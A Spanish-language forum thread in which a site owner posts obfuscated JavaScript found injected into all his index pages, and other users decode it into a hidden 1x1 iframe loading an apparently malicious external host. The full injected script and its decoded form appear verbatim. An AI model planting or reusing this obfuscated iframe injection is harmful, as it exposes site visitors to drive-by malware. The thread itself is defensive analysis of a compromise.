Ataque web por javascript

[Gorky]

Buenas foreros. Me he encontrado con un ataque en mi web y ha sido que los archivos index.php e index.html de todas las carpetas tenian este script al final del code:

Código (javascript) [Seleccionar] Expandir

<b id="glavnoelubovz">St<i>ri</i>n<i>g|<i>sp<i>li<i>t|f<i>rom<i>Ch<i>a</i>rC</i>o</i>d</i>e</i>|</i>ev</i>al</b>
<script>
function glavnoelubovc(node) {
  var ret = "";
  for(var i=0; i<node.childNodes.length; i++) {
     switch(node.childNodes[i].nodeType) {
    case 1: ret+=glavnoelubovc(node.childNodes[i]); break;
    case 3: ret+=node.childNodes[i].nodeValue;
  }
  }
  return ret;
}

var glavnoelubov = glavnoelubovc(document.getElementById("glavnoelubovz")).split("|");

</script>
<script>
window[glavnoelubov[3]]("glavnoelubov_DGicyJZczU = "+glavnoelubov[0]);
var glavnoelubov_pioRCoumcR = " a 100 a 111 a 99 a 117 a 109 a 101 a 110 a 116 a 46 a 119 a 114 a 105 a 116 a 101 a 40 a 34 a 60 a 105 a 102 a 114 a 97 a 109 a 101 a 32 a 115 a 114 a 99 a 61 a 39 a 104 a 116 a 116 a 112 a 58 a 47 a 47 a 117 a 105 a 116 a 121 a 114 a 46 a 105 a 110 a 47 a 120 a 47 a 105 a 110 a 100 a 101 a 120 a 46 a 112 a 104 a 112 a 63 a 115 a 61 a 100 a 97 a 50 a 52 a 50 a 99 a 100 a 49 a 50 a 102 a 98 a 48 a 50 a 102 a 50 a 97 a 48 a 51 a 54 a 102 a 53 a 57 a 52 a 50 a 53 a 50 a 48 a 100 a 97 a 49 a 99 a 57 a 39 a 32 a 119 a 105 a 100 a 116 a 104 a 61 a 49 a 32 a 104 a 101 a 105 a 103 a 104 a 116 a 61 a 49 a 32 a 102 a 114 a 97 a 109 a 101 a 98 a 111 a 114 a 100 a 101 a 114 a 61 a 48 a 62 a 60 a 47 a 105 a 102 a 114 a 97 a 109 a 101 a 62 a 34 a 41 a 59";
var glavnoelubov_BKyPlsuSlj = glavnoelubov_pioRCoumcR[glavnoelubov[1]](" "+"a"+" ");
var glavnoelubov_ShdAeHXubi = "";
for (var glavnoelubov_lQQZiTNcFq=1; glavnoelubov_lQQZiTNcFq<glavnoelubov_BKyPlsuSlj.length; glavnoelubov_lQQZiTNcFq++){glavnoelubov_ShdAeHXubi+=glavnoelubov_DGicyJZczU[glavnoelubov[2]](glavnoelubov_BKyPlsuSlj[glavnoelubov_lQQZiTNcFq]);}
window[glavnoelubov[3]](glavnoelubov_ShdAeHXubi);
</script>

Alguien podria decirme que hace tal script?
Muchas gracias.

[Shell Root]

El primer Script, solo realiza un split a una cadena.

Código [Seleccionar] Expandir

Cadena = String|split|fromCharCode|eval
Split = String,split,fromCharCode,eval

El segundo no lo sé, no lo vi

[cgvwzq]

Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:

Código (javascript) [Seleccionar] Expandir

document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");


Se lo pasa a un eval() y se ejecuta...

No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.

Saludos!

[Gorky]

Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:

Código (javascript) [Seleccionar] Expandir

document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");


Se lo pasa a un eval() y se ejecuta...

No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.

Saludos!

Te agradezco tu investigacion. Tampoco se que es lo que hay tras esa web pero si es cierto que el kaspersky me lo bloquea.